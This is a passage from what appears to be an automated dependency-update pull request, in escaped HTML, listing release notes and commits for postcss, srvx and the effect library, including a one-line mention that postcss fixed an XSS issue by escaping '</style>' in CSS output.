changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e8.5.10\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed XSS via unescaped \u003ccode\u003e\u0026lt;/style\u0026gt;\u003c/code\u003e in non-bundler cases (by \u003ca href=\"https://github.com/TharVid\"\u003e\u003ccode\u003e@​TharVid\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.9\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSpeed up source map encoding paring in case of the error.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.8\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eProcessor#version\u003c/code\u003e.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.7\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eImproved source map annotation cleaning performance (by CodeAnt AI).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.6\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003eContainerWithChildren\u003c/code\u003e type discriminating (by \u003ca href=\"https://github.com/Goodwine\"\u003e\u003ccode\u003e@​Goodwine\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.5\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed \u003ccode\u003epackage.json\u003c/code\u003e→\u003ccode\u003eexports\u003c/code\u003e compatibility with some tools (by \u003ca href=\"https://github.com/JounQin\"\u003e\u003ccode\u003e@​JounQin\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e8.5.4\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eFixed Parcel compatibility issue (by \u003ca href=\"https://github.com/git-sumitchaudhary\"\u003e\u003ccode\u003e@​git-sumitchaudhary\u003c/code\u003e\u003c/a\u003e).\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/33b9790263dc1562a46ce45d9532bd63e95b7986\"\u003e\u003ccode\u003e33b9790\u003c/code\u003e\u003c/a\u003e Release 8.5.10 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/536c79e4b01e58a3a56b09c3c0cf2323f4b9a28b\"\u003e\u003ccode\u003e536c79e\u003c/code\u003e\u003c/a\u003e Escape \u0026lt;/style\u0026gt; in CSS output (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2074\"\u003e#2074\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/afa96b2a139ce625c4d27973313479c7c85f39d4\"\u003e\u003ccode\u003eafa96b2\u003c/code\u003e\u003c/a\u003e Update dependencies (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2073\"\u003e#2073\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/effe88bb87cabdc1876e02adbdd30f392f19f40d\"\u003e\u003ccode\u003eeffe88b\u003c/code\u003e\u003c/a\u003e Typo (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2072\"\u003e#2072\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/3ee79a2c4a11e41d52db50b444eebe38299495ad\"\u003e\u003ccode\u003e3ee79a2\u003c/code\u003e\u003c/a\u003e Thread model (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2071\"\u003e#2071\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/2e0683daca4dc2919211b03774f6b2d137136c01\"\u003e\u003ccode\u003e2e0683d\u003c/code\u003e\u003c/a\u003e Create incident response docs (\u003ca href=\"https://redirect.github.com/postcss/postcss/issues/2070\"\u003e#2070\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/fe88ac29c06b7b218be32994cdc6ca1525bdf2c9\"\u003e\u003ccode\u003efe88ac2\u003c/code\u003e\u003c/a\u003e Release 8.5.9 version\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/c551632496b87ab3f1965bfda5dc386b6c71963e\"\u003e\u003ccode\u003ec551632\u003c/code\u003e\u003c/a\u003e Avoid RegExp when we can use simple JS\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/89a6b744060eb8dee743351c785a9fbe37d4525a\"\u003e\u003ccode\u003e89a6b74\u003c/code\u003e\u003c/a\u003e Move SECURITY.txt for docs folder to keep GitHub page cleaner\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/postcss/postcss/commit/6ceb8a46af9f9de821faee98f861bdf84617347b\"\u003e\u003ccode\u003e6ceb8a4\u003c/code\u003e\u003c/a\u003e Create SECURITY.md\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/postcss/postcss/compare/8.5.3...8.5.10\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `srvx` from 0.10.0 to 0.10.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/h3js/srvx/releases\"\u003esrvx's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.11.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.12...v0.11.13\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eurl:\u003c/strong\u003e Deopt absolute URIs in FastURL (\u003ca href=\"https://github.com/h3js/srvx/commit/de0d699\"\u003ede0d699\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.11...v0.11.12\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance (\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22\"\u003e4051f22\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.11\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.10...v0.11.11\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle duck-typed pipe objects in \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/5e731ef\"\u003e5e731ef\u003c/a\u003e, \u003ca href=\"https://github.com/h3js/srvx/commit/f746e79\"\u003ef746e79\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.10\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.9...v0.11.10\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle error and abort propagation for piped Node.js streams (\u003ca href=\"https://github.com/h3js/srvx/commit/77f879b\"\u003e77f879b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Fallback to socket address on invalid Host header (\u003ca href=\"https://redirect.github.com/h3js/srvx/pull/192\"\u003e#192\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Combine duplicate headers in \u003ccode\u003eentries()\u003c/code\u003e iterator (\u003ca href=\"https://github.com/h3js/srvx/commit/4ed7453\"\u003e4ed7453\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eMarc (\u003ca href=\"https://github.com/snrmwg\"\u003e\u003ccode\u003e@​snrmwg\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.9\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.8...v0.11.9\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003estatic:\u003c/strong\u003e Use path separator instead of hardcoded slash (\u003ca href=\"https://redirect.github.com/h3js/srvx/pull/190\"\u003e#190\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003cstrong\u003efasturl, node:\u003c/strong\u003e Normalize pathname if necessary (\u003ca href=\"https://github.com/h3js/srvx/commit/bd8c0d3\"\u003ebd8c0d3\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eJoël Charles (\u003ca href=\"https://github.com/magne4000\"\u003e\u003ccode\u003e@​magne4000\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.8\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.7...v0.11.8\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/h3js/srvx/blob/main/CHANGELOG.md\"\u003esrvx's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev0.11.13\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.12...v0.11.13\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003eurl:\u003c/strong\u003e Deopt absolute URIs in FastURL (\u003ca href=\"https://github.com/h3js/srvx/commit/de0d699\"\u003ede0d699\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e🏡 Chore\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/4e6ace6\"\u003e4e6ace6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/6a72a00\"\u003e6a72a00\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eFix type issue (\u003ca href=\"https://github.com/h3js/srvx/commit/ed8cc2b\"\u003eed8cc2b\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eApply automated updates (\u003ca href=\"https://github.com/h3js/srvx/commit/7375fed\"\u003e7375fed\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eUpdate deps (\u003ca href=\"https://github.com/h3js/srvx/commit/8f4bc4f\"\u003e8f4bc4f\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.12\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.11...v0.11.12\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance (\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22\"\u003e4051f22\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.11\u003c/h2\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/h3js/srvx/compare/v0.11.10...v0.11.11\"\u003ecompare changes\u003c/a\u003e\u003c/p\u003e\n\u003ch3\u003e🩹 Fixes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Handle duck-typed pipe objects in \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/5e731ef\"\u003e5e731ef\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e✅ Tests\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003cstrong\u003enode:\u003c/strong\u003e Add duck-typed pipe object test for \u003ccode\u003epipeBody\u003c/code\u003e (\u003ca href=\"https://github.com/h3js/srvx/commit/f746e79\"\u003ef746e79\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003e❤️ Contributors\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003ePooya Parsa (\u003ca href=\"https://github.com/pi0\"\u003e\u003ccode\u003e@​pi0\u003c/code\u003e\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003ev0.11.10\u003c/h2\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/e19649a96a33012be5f5c201c11fb388940ade68\"\u003e\u003ccode\u003ee19649a\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.13\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/8f4bc4f2d00622d980f31b4ab205c6e5ad80c02f\"\u003e\u003ccode\u003e8f4bc4f\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/7375fed4a2bf9fb4b64896ce868937eda7cf686f\"\u003e\u003ccode\u003e7375fed\u003c/code\u003e\u003c/a\u003e chore: apply automated updates\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/ed8cc2b900e25da2f0ec1505da1e2edad867b4b6\"\u003e\u003ccode\u003eed8cc2b\u003c/code\u003e\u003c/a\u003e chore: fix type issue\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/6a72a0031063669d6f8320ad6c9a7cac3254fb41\"\u003e\u003ccode\u003e6a72a00\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/de0d69901c357f36a39b7e13eebef6c930652baa\"\u003e\u003ccode\u003ede0d699\u003c/code\u003e\u003c/a\u003e fix(url): deopt absolute URIs in FastURL\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4e6ace6b55686acd6125f608ef6ab3ab1efb057f\"\u003e\u003ccode\u003e4e6ace6\u003c/code\u003e\u003c/a\u003e chore: update deps\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4a11d45e6e909f8433287fd19efcc6b8d9c01820\"\u003e\u003ccode\u003e4a11d45\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.12\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/4051f22700997644200c3bff1eac15418f25c78f\"\u003e\u003ccode\u003e4051f22\u003c/code\u003e\u003c/a\u003e fix(node): improve \u003ccode\u003epipeBody\u003c/code\u003e stability and performance\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/h3js/srvx/commit/f520abaef4685981bd317328723d2ef656e4d707\"\u003e\u003ccode\u003ef520aba\u003c/code\u003e\u003c/a\u003e chore(release): v0.11.11\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/h3js/srvx/compare/v0.10.0...v0.11.13\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `effect` from 3.19.0 to 3.20.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/releases\"\u003eeffect's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eeffect@3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and \u003ccode\u003eSchema.Record\u003c/code\u003e would silently take the wrong code path, returning a Transformation with property signatures instead of a TypeLiteral with index signatures.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6086\"\u003e#6086\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4d97a61a15b9dd6a0eece65b8f0c035e16d42ada\"\u003e\u003ccode\u003e4d97a61\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003egetPropertySignatures\u003c/code\u003e crash on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and other Transformation-producing variants\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003eSchemaAST.getPropertyKeyIndexedAccess\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e. Previously, calling \u003ccode\u003egetPropertySignatures\u003c/code\u003e on a \u003ccode\u003eSchema.Struct\u003c/code\u003e containing \u003ccode\u003eSchema.optionalWith\u003c/code\u003e with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, \u003ccode\u003e{ nullable: true }\u003c/code\u003e, or similar options would throw \u003ccode\u003e\u0026quot;Unsupported schema (Transformation)\u0026quot;\u003c/code\u003e.\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6097\"\u003e#6097\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/f6b0960bf3184109920dfed16ee7dfd7d67bc0f2\"\u003e\u003ccode\u003ef6b0960\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Fix TupleWithRest post-rest validation to check each tail index sequentially.\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.19\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - add short circuit to fiber.await internals\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6079\"\u003e#6079\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/4eb5c008dfc7d2a97b191ca608948d994a2cce4c\"\u003e\u003ccode\u003e4eb5c00\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - build ManagedRuntime synchronously if possible\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6081\"\u003e#6081\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/2d2bb1364a906bd44800c6387b9575fddccdaf53\"\u003e\u003ccode\u003e2d2bb13\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - fix semaphore race condition where permits could be leaked\u003c/p\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.18\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6062\"\u003e#6062\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/12b1f1eadf649e30dec581b7351ba3abb12f8004\"\u003e\u003ccode\u003e12b1f1e\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/tim-smart\"\u003e\u003ccode\u003e@​tim-smart\u003c/code\u003e\u003c/a\u003e! - prevent Stream.changes from writing empty chunks\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eeffect@3.19.17\u003c/h2\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6040\"\u003e#6040\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/a8c436f7004cc2a8ce2daec589ea7256b91c324f\"\u003e\u003ccode\u003ea8c436f\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/jacobconley\"\u003e\u003ccode\u003e@​jacobconley\u003c/code\u003e\u003c/a\u003e! - Fix \u003ccode\u003eStream.decodeText\u003c/code\u003e to correctly handle multi-byte UTF-8 characters split across chunk boundaries.\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/Effect-TS/effect/blob/main/packages/effect/CHANGELOG.md\"\u003eeffect's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e3.20.0\u003c/h2\u003e\n\u003ch3\u003eMinor Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6124\"\u003e#6124\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/8798a843218e6c0c0d3a8eee83360880e370b4da\"\u003e\u003ccode\u003e8798a84\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/mikearnaldi\"\u003e\u003ccode\u003e@​mikearnaldi\u003c/code\u003e\u003c/a\u003e! - Fix scheduler task draining to isolate \u003ccode\u003eAsyncLocalStorage\u003c/code\u003e across fibers.\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch3\u003ePatch Changes\u003c/h3\u003e\n\u003cul\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6107\"\u003e#6107\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/fc82e81448bd9136a37580139ce46a2c61b11b54\"\u003e\u003ccode\u003efc82e81\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/gcanti\"\u003e\u003ccode\u003e@​gcanti\u003c/code\u003e\u003c/a\u003e! - Backport \u003ccode\u003eTypes.VoidIfEmpty\u003c/code\u003e to 3.x\u003c/p\u003e\n\u003c/li\u003e\n\u003cli\u003e\n\u003cp\u003e\u003ca href=\"https://redirect.github.com/Effect-TS/effect/pull/6088\"\u003e#6088\u003c/a\u003e \u003ca href=\"https://github.com/Effect-TS/effect/commit/82996bce8debffcb44feb98bb862cf2662bd56b7\"\u003e\u003ccode\u003e82996bc\u003c/code\u003e\u003c/a\u003e Thanks \u003ca href=\"https://github.com/taylorOntologize\"\u003e\u003ccode\u003e@​taylorOntologize\u003c/code\u003e\u003c/a\u003e! - Schema: fix \u003ccode\u003eSchema.omit\u003c/code\u003e producing wrong result on Struct with \u003ccode\u003eoptionalWith({ default })\u003c/code\u003e and index signatures\u003c/p\u003e\n\u003cp\u003e\u003ccode\u003egetIndexSignatures\u003c/code\u003e now handles \u003ccode\u003eTransformation\u003c/code\u003e AST nodes by delegating to \u003ccode\u003east.to\u003c/code\u003e, matching the existing behavior of \u003ccode\u003egetPropertyKeys\u003c/code\u003e and \u003ccode\u003egetPropertyKeyIndexedAccess\u003c/code\u003e. Previously, \u003ccode\u003eSchema.omit\u003c/code\u003e on a struct combining \u003ccode\u003eSchema.optionalWith\u003c/code\u003e (with \u003ccode\u003e{ default }\u003c/code\u003e, \u003ccode\u003e{ as: \u0026quot;Option\u0026quot; }\u003c/code\u003e, etc.) and 